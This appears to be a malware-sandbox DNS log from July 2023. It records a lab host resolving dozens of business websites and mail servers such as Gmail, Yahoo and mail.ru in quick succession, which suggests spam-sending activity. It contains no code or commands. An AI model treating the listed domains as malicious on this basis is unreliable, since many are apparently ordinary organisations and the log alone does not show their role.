                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:30.548185110 CEST8.8.8.8192.168.2.40x4189No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:30.659861088 CEST8.8.8.8192.168.2.40x6bd1No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:30.659861088 CEST8.8.8.8192.168.2.40x6bd1No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:31.660043001 CEST8.8.8.8192.168.2.40xc3dName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:32.190064907 CEST8.8.8.8192.168.2.40x7ecbNo error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:32.675626040 CEST8.8.8.8192.168.2.40x1b53No error (0)smtp.mail.yahoo.comsmtp.mail.global.gm0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:32.675626040 CEST8.8.8.8192.168.2.40x1b53No error (0)smtp.mail.global.gm0.yahoodns.net87.248.97.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.479551077 CEST8.8.8.8192.168.2.40xf48No error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:34.407090902 CEST8.8.8.8192.168.2.40xa1dNo error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:36.030278921 CEST8.8.8.8192.168.2.40xce69Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.137849092 CEST8.8.8.8192.168.2.40x6e4No error (0)gmail-smtp-in.l.google.com142.250.27.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.617990017 CEST8.8.8.8192.168.2.40x4485No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.838476896 CEST8.8.8.8192.168.2.40x901fNo error (0)umcor.am188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.838476896 CEST8.8.8.8192.168.2.40x901fNo error (0)umcor.am188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.840536118 CEST8.8.8.8192.168.2.40xa006No error (0)bount.com.tw188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.840536118 CEST8.8.8.8192.168.2.40xa006No error (0)bount.com.tw188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.842329025 CEST8.8.8.8192.168.2.40x82f6No error (0)apcotex.com35.154.163.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.876221895 CEST8.8.8.8192.168.2.40xc8b2No error (0)atbauk.org172.67.196.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.876221895 CEST8.8.8.8192.168.2.40xc8b2No error (0)atbauk.org104.21.92.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.881346941 CEST8.8.8.8192.168.2.40xe51eNo error (0)hes.pt52.19.230.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.923082113 CEST8.8.8.8192.168.2.40x3ad3No error (0)zemarmot.net164.132.175.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.992774010 CEST8.8.8.8192.168.2.40xff3No error (0)mxs.mail.ru217.69.139.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.992774010 CEST8.8.8.8192.168.2.40xff3No error (0)mxs.mail.ru94.100.180.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.007751942 CEST8.8.8.8192.168.2.40x900aNo error (0)oozkranj.com212.44.102.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.008116007 CEST8.8.8.8192.168.2.40xa32No error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.018760920 CEST8.8.8.8192.168.2.40xe4a1No error (0)cutchie.com199.59.243.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.043401003 CEST8.8.8.8192.168.2.40x39ffNo error (0)alt4.gmail-smtp-in.l.google.com142.250.157.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.063904047 CEST8.8.8.8192.168.2.40xb6adNo error (0)biosolve.com151.101.130.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.069358110 CEST8.8.8.8192.168.2.40xb5afNo error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.069358110 CEST8.8.8.8192.168.2.40xb5afNo error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.095453024 CEST8.8.8.8192.168.2.40x1496Name error (3)pcoyuncu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.111296892 CEST8.8.8.8192.168.2.40x542dNo error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.119807959 CEST8.8.8.8192.168.2.40xe46aNo error (0)gmail-smtp-in.l.google.com142.250.27.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.131392002 CEST8.8.8.8192.168.2.40x4e4fNo error (0)aoinko.net157.7.107.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.134007931 CEST8.8.8.8192.168.2.40x42c2Name error (3)pcoyuncu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.135695934 CEST8.8.8.8192.168.2.40xd3b6No error (0)shztm.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.137442112 CEST8.8.8.8192.168.2.40x6a40No error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.137442112 CEST8.8.8.8192.168.2.40x6a40No error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.137442112 CEST8.8.8.8192.168.2.40x6a40No error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.147238016 CEST8.8.8.8192.168.2.40x3729No error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.147238016 CEST8.8.8.8192.168.2.40x3729No error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.147238016 CEST8.8.8.8192.168.2.40x3729No error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.147238016 CEST8.8.8.8192.168.2.40x3729No error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.158780098 CEST8.8.8.8192.168.2.40xc0bNo error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.158780098 CEST8.8.8.8192.168.2.40xc0bNo error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.158780098 CEST8.8.8.8192.168.2.40xc0bNo error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.158780098 CEST8.8.8.8192.168.2.40xc0bNo error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.183319092 CEST8.8.8.8192.168.2.40xb66cName error (3)pcoyuncu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.199107885 CEST8.8.8.8192.168.2.40x64f7No error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.251929998 CEST8.8.8.8192.168.2.40x4e7dNo error (0)ikulani.com157.7.107.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.257066011 CEST8.8.8.8192.168.2.40xbaaaNo error (0)lpver.com92.204.129.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.268934965 CEST8.8.8.8192.168.2.40xd738Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.270379066 CEST8.8.8.8192.168.2.40x1b12No error (0)in1.smtp.messagingengine.com103.168.172.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.270379066 CEST8.8.8.8192.168.2.40x1b12No error (0)in1.smtp.messagingengine.com103.168.172.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.270379066 CEST8.8.8.8192.168.2.40x1b12No error (0)in1.smtp.messagingengine.com103.168.172.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.270379066 CEST8.8.8.8192.168.2.40x1b12No error (0)in1.smtp.messagingengine.com103.168.172.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.270379066 CEST8.8.8.8192.168.2.40x1b12No error (0)in1.smtp.messagingengine.com103.168.172.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.270379066 CEST8.8.8.8192.168.2.40x1b12No error (0)in1.smtp.messagingengine.com103.168.172.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.344326019 CEST8.8.8.8192.168.2.40x7af9No error (0)araax.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.344326019 CEST8.8.8.8192.168.2.40x7af9No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.344326019 CEST8.8.8.8192.168.2.40x7af9No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.344326019 CEST8.8.8.8192.168.2.40x7af9No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.371895075 CEST8.8.8.8192.168.2.40xee10No error (0)indonesiamedia.com74.208.215.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.382460117 CEST8.8.8.8192.168.2.40xc355Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.425267935 CEST8.8.8.8192.168.2.40xa9a5No error (0)tabbles.net80.211.41.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.434592962 CEST8.8.8.8192.168.2.40x95adNo error (0)nts-web.net49.212.235.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.443046093 CEST8.8.8.8192.168.2.40x8f63Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.447915077 CEST8.8.8.8192.168.2.40x6796No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.451072931 CEST8.8.8.8192.168.2.40xc9eNo error (0)metaforacom.com185.42.105.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.461360931 CEST8.8.8.8192.168.2.40xd227No error (0)nels.co.uk5.134.13.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.469985962 CEST8.8.8.8192.168.2.40x1586No error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.544236898 CEST8.8.8.8192.168.2.40x8211No error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.544236898 CEST8.8.8.8192.168.2.40x8211No error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.544236898 CEST8.8.8.8192.168.2.40x8211No error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.544236898 CEST8.8.8.8192.168.2.40x8211No error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.568465948 CEST8.8.8.8192.168.2.40xbd2cNo error (0)insia.com82.208.6.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.568566084 CEST8.8.8.8192.168.2.40xa0acNo error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.590562105 CEST8.8.8.8192.168.2.40x6ddServer failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.600550890 CEST8.8.8.8192.168.2.40xda5cNo error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.600550890 CEST8.8.8.8192.168.2.40xda5cNo error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.600550890 CEST8.8.8.8192.168.2.40xda5cNo error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.600550890 CEST8.8.8.8192.168.2.40xda5cNo error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.610557079 CEST8.8.8.8192.168.2.40xe457No error (0)mxs.mail.ru217.69.139.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.610557079 CEST8.8.8.8192.168.2.40xe457No error (0)mxs.mail.ru94.100.180.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.616957903 CEST8.8.8.8192.168.2.40x1d3dNo error (0)sanfotek.net216.69.141.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.633610010 CEST8.8.8.8192.168.2.40xff7eNo error (0)onzcda.com35.186.238.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.638459921 CEST8.8.8.8192.168.2.40x9f9fName error (3)mail7.digitalwaves.co.nznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.640387058 CEST8.8.8.8192.168.2.40x7398No error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.661220074 CEST8.8.8.8192.168.2.40x4cabNo error (0)gcss.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.661220074 CEST8.8.8.8192.168.2.40x4cabNo error (0)gcss.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.665703058 CEST8.8.8.8192.168.2.40x390aNo error (0)alt4.gmail-smtp-in.l.google.com142.250.157.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.668831110 CEST8.8.8.8192.168.2.40x8caaNo error (0)ludea.cz46.8.8.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.724673986 CEST8.8.8.8192.168.2.40x7be3No error (0)dyag-eng.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.724673986 CEST8.8.8.8192.168.2.40x7be3No error (0)dyag-eng.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.728148937 CEST8.8.8.8192.168.2.40x4512No error (0)gmail-smtp-in.l.google.com142.250.27.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.728193998 CEST8.8.8.8192.168.2.40xe987No error (0)603888.comnum6.17986.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.728193998 CEST8.8.8.8192.168.2.40xe987No error (0)num6.17986.net67.21.93.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.768631935 CEST8.8.8.8192.168.2.40x4f2cNo error (0)in1.smtp.messagingengine.com103.168.172.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.768631935 CEST8.8.8.8192.168.2.40x4f2cNo error (0)in1.smtp.messagingengine.com103.168.172.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.768631935 CEST8.8.8.8192.168.2.40x4f2cNo error (0)in1.smtp.messagingengine.com103.168.172.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.768631935 CEST8.8.8.8192.168.2.40x4f2cNo error (0)in1.smtp.messagingengine.com103.168.172.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.768631935 CEST8.8.8.8192.168.2.40x4f2cNo error (0)in1.smtp.messagingengine.com103.168.172.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.768631935 CEST8.8.8.8192.168.2.40x4f2cNo error (0)in1.smtp.messagingengine.com103.168.172.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.776048899 CEST8.8.8.8192.168.2.40x6e23No error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.779429913 CEST8.8.8.8192.168.2.40x2188No error (0)ramkome.com62.75.216.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.802989006 CEST8.8.8.8192.168.2.40xd132No error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.802989006 CEST8.8.8.8192.168.2.40xd132No error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.802989006 CEST8.8.8.8192.168.2.40xd132No error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.811788082 CEST8.8.8.8192.168.2.40xc607No error (0)akr.co.id172.67.33.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.811788082 CEST8.8.8.8192.168.2.40xc607No error (0)akr.co.id104.20.122.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.811788082 CEST8.8.8.8192.168.2.40xc607No error (0)akr.co.id104.20.123.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.834361076 CEST8.8.8.8192.168.2.40x1666No error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.856843948 CEST8.8.8.8192.168.2.40xb8eeNo error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.873876095 CEST8.8.8.8192.168.2.40x102fNo error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.873876095 CEST8.8.8.8192.168.2.40x102fNo error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.873876095 CEST8.8.8.8192.168.2.40x102fNo error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.945034981 CEST8.8.8.8192.168.2.40x6bNo error (0)zupraha.cz77.78.104.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.966238976 CEST8.8.8.8192.168.2.40x2f70No error (0)strazynski.pl85.128.196.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.976125956 CEST8.8.8.8192.168.2.40x30c1No error (0)shztm.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.979490995 CEST8.8.8.8192.168.2.40x10a2No error (0)hyab.se188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.979490995 CEST8.8.8.8192.168.2.40x10a2No error (0)hyab.se188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.002351046 CEST8.8.8.8192.168.2.40x2052No error (0)mxs.mail.ru217.69.139.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.002351046 CEST8.8.8.8192.168.2.40x2052No error (0)mxs.mail.ru94.100.180.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.003341913 CEST8.8.8.8192.168.2.40xbae1No error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.003341913 CEST8.8.8.8192.168.2.40xbae1No error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.005696058 CEST8.8.8.8192.168.2.40x441cNo error (0)x96.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.005696058 CEST8.8.8.8192.168.2.40x441cNo error (0)x96.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.034909964 CEST8.8.8.8192.168.2.40x4bc0No error (0)wolffkran.de46.4.56.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.041708946 CEST8.8.8.8192.168.2.40xe7ecNo error (0)plaske.ua5.181.161.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.053740978 CEST8.8.8.8192.168.2.40xe90eNo error (0)dhh.la.gov52.200.51.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.062498093 CEST8.8.8.8192.168.2.40xd51fNo error (0)alt4.gmail-smtp-in.l.google.com142.250.157.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.069979906 CEST8.8.8.8192.168.2.40xf863No error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.077594042 CEST8.8.8.8192.168.2.40xf55dNo error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.092010021 CEST8.8.8.8192.168.2.40x1dcNo error (0)likangds.com156.251.140.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.124763966 CEST8.8.8.8192.168.2.40x8d99No error (0)gmail-smtp-in.l.google.com142.250.27.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.129568100 CEST8.8.8.8192.168.2.40x196bNo error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.134773016 CEST8.8.8.8192.168.2.40x7d1dNo error (0)leapc.com35.231.13.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.143368959 CEST8.8.8.8192.168.2.40x9439Name error (3)mail7.digitalwaves.co.nznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.150870085 CEST8.8.8.8192.168.2.40x27aNo error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.151043892 CEST8.8.8.8192.168.2.40xf841No error (0)pleszew.policja.gov.pl91.229.22.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.178137064 CEST8.8.8.8192.168.2.40x9625No error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.181396008 CEST8.8.8.8192.168.2.40xed10No error (0)sigtoa.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.181396008 CEST8.8.8.8192.168.2.40xed10No error (0)sigtoa.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.214708090 CEST8.8.8.8192.168.2.40xe0f3No error (0)cjborden.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.214708090 CEST8.8.8.8192.168.2.40xe0f3No error (0)cjborden.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.236732960 CEST8.8.8.8192.168.2.40x4c32No error (0)orlyhotel.com172.67.156.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.236732960 CEST8.8.8.8192.168.2.40x4c32No error (0)orlyhotel.com104.21.48.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.244820118 CEST8.8.8.8192.168.2.40xa9bbName error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.246490955 CEST8.8.8.8192.168.2.40x5222No error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.248940945 CEST8.8.8.8192.168.2.40xd1eNo error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.248940945 CEST8.8.8.8192.168.2.40xd1eNo error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.248940945 CEST8.8.8.8192.168.2.40xd1eNo error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.248940945 CEST8.8.8.8192.168.2.40xd1eNo error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.253089905 CEST8.8.8.8192.168.2.40xd549No error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.255992889 CEST8.8.8.8192.168.2.40xdc06No error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.286463976 CEST8.8.8.8192.168.2.40x88e1Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.308507919 CEST8.8.8.8192.168.2.40x698bNo error (0)magicomm.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.343611956 CEST8.8.8.8192.168.2.40x925aName error (3)chzko.runonenoneA (IP address)IN (0x0001)false
